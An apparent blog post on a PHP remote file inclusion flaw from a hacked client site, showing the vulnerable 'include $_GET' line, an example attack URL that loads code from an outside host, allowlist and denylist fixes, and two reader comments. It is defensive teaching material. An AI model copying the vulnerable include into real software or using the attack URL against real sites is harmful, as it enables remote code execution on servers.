URL Injection / Hacking website / Taking control / {PHP}

You never really know a thing until it happens to you. One of my client sites got hacked because of URL injection. The problem was that deep inside the page there was a line:

include $_GET["somebloodyfile"];

A novice hacker could write something in the URL like: mypage?somebloodyfile=http://domain2/code.txt

and in http://domain2/code.txt he/she can have a message showing: Hacked by a bloody hacker. Because include() treats the fetched file as PHP, the attacker is running code of their own choosing on the server, not just displaying a message. So what's the solution?

Here is how it should be done. 

Complicated Way to solve:

… html header …

<?php
//list of valid pages (allowlist: only these exact paths can ever be included)
$pages=array("games/index.html", "news/news.html", "games/1.html");

//page requested in the URL (the original relied on register_globals to fill $page)
$page=isset($_GET["page"]) ? $_GET["page"] : "";

//check $page variable against the list; stop as soon as a match is found
$valid=false;
for ($i=0; $i<sizeof($pages) && !$valid; $i++) {
 if ($page===$pages[$i]) {
  $valid=true;
 }
}
if ($valid) include($page);
if (!$valid) include($pages[0]); // include the first page if not valid
?>

… html footer …

Alternate but easy way:

… html header …

<?php
   //characters stripped from the page name before it is used as a bare
   //file name under pages/ (a denylist only blocks what it lists, so the
   //allowlist above is the stronger of the two)
   $invalidChars=array("/", ".", "\\", "\"", ";", "http", ":", "!", "*", "&");
   $page=isset($_GET["page"]) ? $_GET["page"] : "";
   $page=str_replace($invalidChars,"",$page);
   include ("pages/".$page.".html");
?>

… html footer …
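As an added example, not the post's own code, here is the allowlist idea behind both solutions above carried one step further: the URL carries only a short key, the key is looked up in a fixed map (so no user-controlled string ever reaches include()), and the mapped file is checked with realpath() to sit under the pages directory before inclusion. The directory and file names are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not the post's own code. The page key from the URL is only
// ever used to look up a fixed map, so no user-controlled string reaches
// include(). Directory and file names are assumptions for illustration.
const PAGES_DIR = __DIR__ . '/pages';

// Allowed page keys and the files they map to.
const PAGE_MAP = [
    'home'  => 'games/index.html',
    'news'  => 'news/news.html',
    'game1' => 'games/1.html',
];

// Return the relative file for a key, or null for anything not in the map
// (URLs, paths, empty strings: all simply fail the lookup).
function lookupPage(string $key): ?string
{
    return PAGE_MAP[$key] ?? null;
}

// Include a mapped file only if its canonical path stays under PAGES_DIR.
// This second check guards against a mis-edited map entry such as '../x'.
function includePage(string $relative): bool
{
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $relative);
    if ($base === false || $path === false) {
        return false;                              // missing dir or file
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;                              // escaped the pages dir
    }
    include $path;
    return true;
}

// Constructed inputs: only the first is accepted.
foreach (['news', 'http://domain2/code.txt', '../games/index.html', ''] as $in) {
    $file = lookupPage($in);
    printf("%-28s => %s\n", var_export($in, true), $file ?? 'rejected');
}

// Router: unknown keys fall back to the first page, as in the post.
$relative = lookupPage($_GET['page'] ?? '') ?? PAGE_MAP['home'];
if (!includePage($relative)) {
    http_response_code(404);
}
```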


6 thoughts on “URL Injection / Hacking website / Taking control / {PHP}”

  1. I think it is not recommended to use $_GET for including..

    that is in my opinion too dangerous but yeah.. this workaround will do it too 😉

    greets

  2. You could also scan the dir and put each file in a directory in an array and then take out the “.” and the “..” in the array and then check if the webpage is on one of the webpages in the array. This is a whole lot more secure from what I would have to say.
